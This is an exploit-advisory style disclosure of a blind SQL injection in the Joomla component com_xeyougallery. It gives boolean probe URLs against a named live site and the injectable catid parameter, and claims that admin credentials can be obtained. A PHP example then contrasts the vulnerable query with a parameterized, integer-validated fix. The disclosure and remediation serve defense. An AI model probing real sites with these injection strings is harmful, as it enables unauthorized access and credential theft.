<------------------- header data start ------------------- >

#####################################################################
# Joomla Component com_xeyougallery Blind SQL Injection Vulnerability #
#####################################################################

# author          : Fl0riX

# Home           : www.Cyber-Warrior.Org

# Name           : com_xeyougallery

# Bug Type      : (Blind) SQL Injection

# Infection       : Admin login credentials can be obtained.

# Demo Vuln.    :
TRUE(+)
» http://sim-3d.com/index.php?option=com_xeyougallery&Itemid=59&func=viewcategory&catid=1 and 1=1
FALSE(-)
» http://sim-3d.com/index.php?option=com_xeyougallery&Itemid=59&func=viewcategory&catid=1 and 1=0

# Bug Fix Advice : Malicious characters should be filtered.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_xeyougallery&Itemid=59&func=viewcategory&catid=[SQL INJ.]

< -- bug code end of -- >
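
An added example for the fix advice above, not the component's own code: the vulnerable query pattern next to a hardened form for the numeric catid parameter. The gallery_items table, both function names and the sample rows are assumptions, and it uses PDO with an in-memory SQLite database so that it runs stand-alone.

```php
<?php
// Added example: hypothetical table and function names, not the component's code.

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE gallery_items (id INTEGER PRIMARY KEY, catid INTEGER, title TEXT)');
$db->exec("INSERT INTO gallery_items (catid, title) VALUES (1, 'front'), (1, 'side'), (2, 'top')");

// "Before": the request value is concatenated into the statement, so
// anything that follows the number is parsed as SQL.
function viewCategoryUnsafe(PDO $db, string $catid): array
{
    $sql = 'SELECT title FROM gallery_items WHERE catid = ' . $catid;
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// "After": accept only a positive decimal integer, then bind it as a parameter.
function viewCategorySafe(PDO $db, string $catid): array
{
    $id = filter_var($catid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];   // reject the request instead of trying to strip characters
    }
    $stmt = $db->prepare('SELECT title FROM gallery_items WHERE catid = :catid');
    $stmt->bindValue(':catid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// The two catid values from the demo section, plus a normal request.
foreach (['1', '1 and 1=1', '1 and 1=0'] as $value) {
    printf("%-12s unsafe=%d rows  safe=%d rows\n", "'$value'",
        count(viewCategoryUnsafe($db, $value)), count(viewCategorySafe($db, $value)));
}
```

In the unsafe function the two demo values return different row counts, which is the TRUE/FALSE difference a blind injection relies on; the safe function rejects both. In Joomla versions that ship the JRequest class, JRequest::getInt('catid') performs the same integer coercion on the request value.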

 		 	   		  